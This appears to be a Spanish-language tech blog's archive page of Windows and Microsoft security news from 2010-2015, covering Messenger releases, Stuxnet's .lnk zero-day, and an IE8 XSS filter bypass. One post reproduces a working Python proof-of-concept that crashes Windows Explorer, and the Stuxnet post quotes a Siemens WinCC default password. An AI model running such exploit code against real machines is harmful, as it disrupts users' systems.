jueves, 25 de junio de 2015
Windows 10 será gratuito? Para quienes si y para quién no? una explicación breve
sábado, 12 de mayo de 2012
Unlock Root Android 2.1, 2.2, 2.3
- HTC Sensation
- Galaxy Nexus (i9250)
- LG Optimus 3D (P920)
- HTC Wildfire S
- Galaxy Note (I9220)
- LG Optimus 2x
- HTC Desire S
- Galaxy S II (I9100)
- LG Optimus LET
- HTC Incredible S
- Galaxy S (I9000)
- LG Optimus Black
- LG Optimus PRO (c660h)
viernes, 30 de diciembre de 2011
Windows Explorer Denial Of Service (DOS)
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack
from win32com.shell import shell, shellcon
from os import mkdir
try:
mkdir("c:\\trigger_alt")
except:
print "[!] Trigger Directory Exists"
try:
mkdir("c:\\trigger_alt\\....")
except:
print "[!] Trigger Sub Directory Exists"
print "[!] Triggering Issue"
# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete
shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))
miércoles, 23 de marzo de 2011
Windows Live Messenger 2011 15.4.3508.1109
martes, 4 de enero de 2011
Nuevos detalles de Windows 8 Milestone 2
domingo, 26 de diciembre de 2010
Desbordamiento de memoria intermedia a través del servicio FTP en IIS 7.x
viernes, 26 de noviembre de 2010
0 day: Elevación de privilegios en Microsoft Windows
ChevronWP7, primer 'jailbreak' para Windows Phone 7

Un grupo de significados blogueros han publicado una herramienta denominada ChevronWP7 que permite ejecutar aplicaciones sin firmar en los terminales con el nuevo sistema operativo Windows Phone 7. Además, permite la creación de aplicaciones alternativas a las oficiales y sin necesidad de ser desarrollador oficial de Microsoft o lo que es lo mismo, sin pasar por caja abonando los 99 dólares que cuesta la licencia.
Ya está disponible la herramienta ChevronWP7, la primera –dicen- para el jailbreak de los terminales con la nueva plataforma móvil de Microsoft.
Jailbreak limitado ya que los creadores dicen ‘estar en contra de la piratería’ y por ello su herramienta ‘no permite romper la protección de las aplicaciones existentes en el MarketPlace’.
Más que eso permite aumentar el potencial de los terminales ejecutando homebrew, software de terceros sin firmar y sin pasar por la tienda en línea oficial de aplicaciones de Windows Phone 7.
Original de Vanguardia.com.mx
domingo, 14 de noviembre de 2010
Windows Live Messenger 8.5
domingo, 22 de agosto de 2010
Windows Live Messenger 2011 15.4.3002.810 Beta 2
Windows Live Messenger ahora con facebook y flicker.
jueves, 19 de agosto de 2010
Windows Live Messenger 2011 15.4.3002.810 Beta

Windows Live Messenger 2011 rompe por primera vez con el diseño clásico de Messenger hasta la fecha: una ventana con contactos con los que más tarde puedes interactuar.
En lugar de ello, la ventana de Windows Live Messenger 2011 se expande para aunar en un mismo espacio las actividades de tus contactos en redes sociales como Facebook o MySpace, así como tus contactos propiamente dichos. Nunca antes podías tener tan "controlados" a tus amigos.
No sorprende por tanto que el aspecto de Windows Live Messenger 2011, con pestañas incluidas, sea una de las principales novedades: incluso los emoticonos han sufrido un lavado de cara, con nuevos fichajes incluidos. Sin embargo, los cambios de Windows Live Messenger 2011 no terminan ahí.
Con Windows Live Messenger 2011, compartir datos con tus contactos es cosa de niños. Las fotografías (desde tu equipo, webs o álbumes online) se muestran en una agradable vista compartida. Además, no sólo podrás enviar clips de voz: ahora también puedes mandar clips de vídeo.
En definitiva, Windows Live Messenger 2011 es, por fin, una versión completamente nueva tanto en el aspecto como en el concepto, a la que sólo queda reprochar su incompatibilidad con Windows XP.
Cambios recientes en Windows Live Messenger:
* Pequeños cambios en la interfaz
* Corrección de errores
* Más rápido y consume menos recursos
* Chat con amigos de Facebook (no disponible en todos los países todavía)
Para utilizar Windows Live Messenger necesitas:
* Sistema operativo: WinVista/7
No compatible con win xp
descargar aqui
miércoles, 18 de agosto de 2010
Microsoft actualiza su Windows Live 2011 beta
A través de su blog oficial, Microsoft agradece las aportaciones y señala que para el Messenger recibió 3 millones de sugerencias de actualizaciones, 3.5 millones para el tema de imágenes, 6.2 millones para el de videollamadas y 7.6 millones para el estado del mail.
"Sus comentarios y su uso han contribuido a delinear las mejoras que hemos hecho y seguiremos haciendo en el Messenger, Photo Gallery, Movie Maker, Writer, Mail y protección infantil", señala Chris Jones, vicepresidente de Windows Live.
Algunas de las mejoras hasta el momento son:
* Disminuyó el tiempo para iniciar cada programa
* El Messenger es más rápido.
* La videollamada es más eficiente al utilizar un 30 por ciento menos de los recursos del CPU.
* La galería de fotos es mejor y baja más rápido.
* El Movie Maker logra cargas películas de mayor tamaño y mejor resolución.
* Writer ha mejorado significativamente la calidad de su corrección ortográfica y tiene una mejor integración con programas de Microsoft Office.
* El Gmail ha mejorado. Ahora se encarga de automatizar el spam y la carpeta de basura correctamente.
* El filtro de protección infantil es 35 por ciento más rápido.
"Además, hemos sido capaces de mejorar la calidad del software y hemos tomado en cuenta más del 75 por ciento de los errores reportados", menciona Jones, quien invita a los usuarios a bajar la actualización para probar los cambios y hacer sugerencias.
via eluniversal
descargar aqui
martes, 3 de agosto de 2010
Microsoft publica actualización fuera de ciclo para vulnerabilidad en los .lnk

La publicación con carácter de urgencia se debe a que como ya habíamos anunciado se habían facilitado todos los detalles de la vulnerabilidad y además está siendo aprovechada de forma activa.
El problema afecta a Windows XP, Vista, Windows 7, Windows Server 2008 y Windows Server 2008 R2. Tal y como reconoce Microsoft, en la actualidad hay múltiples familias de malware que se aprovechan de esta vulnerabilidad y esta actualización protege contra cualquier intento de explotación.
Dada la gravedad de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible, mediante Windows Update o descargando los parches, según versión, desde las direcciones facilitadas en el propio boletín de seguridad:
Descarga el parche de seguridad (crítico):
http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx
lunes, 19 de julio de 2010
Interesante (y peligroso) troyano que aprovecha un interesante (y peligroso) 0 day en Microsoft Windows
Cómo ha sido descubierto
VirusBlokAda descubrió, ya el 17 de junio (lo que da una idea de la posible cantidad de tiempo que esta amenaza lleva atacando silenciosamente) módulos de un malware nuevo. Pasadas unas semanas, alertaron sobre algo realmente inusual en este troyano: su forma de propagarse a través de memorias USB prescindiendo del tradicional archivo autorun.inf, que permite la ejecución automática cuando se detecta un dispositivo extraíble y funcionalidad contra la que Microsoft lleva tiempo luchando.
El troyano usaba en cierta manera, una vulnerabilidad (para la que no existe parche) en archivos .LNK (accesos directos), que permite la ejecución de código aunque el AutoPlay y AutoRun se encuentren desactivados. A efectos prácticos, implica que se ha descubierto una nueva forma totalmente nueva de ejecutar código en Windows cuando se inserta un dispositivo extraíble, independientemente de que se hayan tomado todas las medidas oportunas conocidas hasta el momento para impedirlo.
Para qué estaba siendo usado
Independientemente de su método de propagación, el investigador Frank_Boldewin comenzó a analizar una de las muestras y descubrió que el objetivo del malware estaba dirigido específicamente contra sistemas SCADA WinCC de Siemens, que se ejecutan en Windows. Dentro de su código contenía la contraseña por defecto "2WSXcder" para la base de datos central del producto de Siemens, y al parecer el fabricante recomienda no modificarla. Por tanto el troyano conseguía acceso de administración de la base de datos. Los sistemas "Supervisory Control and Data Acquisition (SCADA)" son programas críticos de producción industrial: toman datos muy sensibles de sensores de una fábrica, por ejemplo, y los envían a un sistema central para ser controlados. Se usan en grandes plantas de tratamiento de aguas, control eléctrico, de tráfico... Por tanto, se trata de un malware destinado a un perfil muy diferente del usuario "medio". En otras palabras, malware para al espionaje industrial. Se está usando sobre todo en Indonesia, India e Irán.
Un malware muy profesional
El troyano se esconde con habilidades de rootkit para pasar desapercibido en los sistemas en los que consigue instalarse. Llama la atención, como se ha mencionado, el uso de una vulnerabilidad desconocida hasta ahora en los accesos directos, lo que da una nueva vuelta de tuerca a la pesadilla del AutoRun para Microsoft. Lejos de usar el tradicional autorun.inf (contra el que ya se puso remedio), se propaga en llaves USB en forma de archivos del tipo ~WTR4132.tmp, por ejemplo. Se parecen mucho a los ficheros temporales de Word que usa Office internamente cuando un fichero está en uso.
Para colmo, el troyano utiliza para su funcionalidad de rootkit unos drivers firmados digitalmente por la famosa empresa china Realtek. Esto significa que, en principio, solo Realtek puede ser responsable de ese código... excepto que su clave privada haya sido comprometida de alguna forma, cosa que no se ha confirmado todavía. En cualquier caso, Microsoft, muy acertadamente, ha trabajado con Verisign para revocar en sus sistemas los certificados (con el apoyo de Realtek también). Esto quiere decir que los sistemas bien configurados (que no puedan instalar drivers no firmados o firmados con certificados revocados) no sufrirán este problema... eso sí, tendrán que actualizar su lista de certificados a través de windowsupdate.com.
El uso de certificados legítimos es de lo más interesante para un malware, y lo hace una pieza casi única. Otros troyanos han sido firmados antes, pero no nos consta que se haya realizado la firma con un certificado válido de una empresa reconocida.
Y ahora qué
Pues este malware pone de nuevo sobre la mesa las posibilidades de la creación de troyanos específicos, de amenazas personalizadas y "trabajadas" convenientemente para pasar desapercibidas. O sea: usando vulnerabilidades no conocidas, criptografía, rootkits....
Tarde o temprano los detalles técnicos sobre la vulnerabilidad en accesos directos saldrán a la luz, y todo tipo de malware comenzará a usar este nuevo método para propagarse por llaves USB. Recordemos el éxito de Conficker en octubre de 2009, que también encontró una forma de eludir la desactivación de AutoRun en Windows (gracias a una modificación en autorun.inf que no se tuvo en cuenta) y que obligó a Microsoft a modificar toda su filosofía en este sentido y desactivar (se creía que de forma eficaz hasta ahora) por completo el dichoso AutoRun.
Microsoft ha publicado un alerta reconociendo la vulnerabilidad y recomendando estas contramedidas:
* Poner en blanco el valor predeterminado (default) de la rama del registro:
HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
* Detener y deshabilitar el servicio "cliente web" (WebClient).
Además, lo de siempre: no usar la cuenta de administrador, mantenerse informado, no usar memorias USB no confiables y mantener actualizado el sistema y el antivirus.
The Stuxnet Sting
http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx
Rootkit.TmpHider
http://www.wilderssecurity.com/showpost.php?p=1712134&postcount=22
Vis Hispasec
jueves, 22 de abril de 2010
El filtro XSS de Internet Explorer 8 sigue siendo vulnerable
Microsoft introdujo un mecanismo para filtrar ataques de cross-site scripting, concretamente los de "tipo 1" o no persistentes. Un cross-site scripting no persistente es la clase de ataque más común y extendida de este tipo de ataques.
El atacante manipula una URL insertando código malicioso que, de manera errónea, aprovechando una vulnerabilidad, el sitio web usará para generar una página que contendrá el código legítimo más el código introducido por el atacante.
La víctima que "inadvertidamente" use la URL proporcionada por el atacante, enviará una petición hacia el servidor web y este "reflejará" el código de vuelta hacia el cliente donde es usado por el navegador como si fuese código legítimo.
Es denominado no persistente ya que el servidor no almacena el código malicioso y es reflejado porqué en realidad es el mismo navegador el que va a enviar el ataque a través de la petición HTTP hacia el servidor web y éste de vuelta al navegador de la víctima.
La idea general del filtro XSS de Internet Explorer, es observar la secuencia solicitud-respuesta entre navegador y sitio web. A grandes rasgos, modifica el código que se recibe del servidor antes de que sea interpretado por el navegador, si detecta que la página recibida contiene código sospechoso enviado en una de las solicitudes del navegador. Básicamente, evita "reflejar" el código malicioso.
La base del mecanismo de neutralización de ataques del filtro es alterar el código malicioso. En caso de observar código sospechoso de vuelta al navegador, el filtro actúa antes de que se interprete la página, insertando o reemplazando caracteres en partes de ese código para impedir su ejecución transformándolo en código no válido.
Ya en su momento se hizo público una vulnerabilidad que aprovechaba el filtro XSS para producir este tipo de ataques. Microsoft liberó un boletín (MS10-002) en el que se corregía la vulnerabilidad. Aun así, se encontraron nuevas formas para revertir el uso del filtro y Microsoft volvió a reforzarlo en un nuevo boletín (MS10-018).
Lo que han mostrado los investigadores es que es no solo es posible evadir el filtro sino que sigue siendo posible efectuar ataques de cross-site scripting, incluso en sitios webs que no son vulnerables. Adicionalmente, el filtro también podría ser usado por el atacante para impedir la ejecución de scripts legítimos, posibilitando la evasión de mecanismos de seguridad propios del sitio web visitado.
David Ross de Microsoft, ha confirmado que publicarán un parche hacia el mes de junio para prevenir este tipo de ataque.
Más Información:
Abusing IE8s XSS Filters [PDF]
http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf
Guidance on Internet Explorer XSS Filter
http://blogs.technet.com/msrc/archive/2010/04/19/guidance-on-internet-explorer-xss-filter.aspx
jueves, 11 de marzo de 2010
Nuevo 0-day en Microsoft Internet Explorer
domingo, 7 de marzo de 2010
Descubren un fallo en Windows con una década de antigüedad
martes, 2 de marzo de 2010
Alerta con Microsoft Essencials 2010
sábado, 27 de febrero de 2010
En marzo morirá Internet Explorer 6
domingo, 3 de enero de 2010
Un regalo de reyes: Neal Stephenson - El codigo enigma o criptonomicon
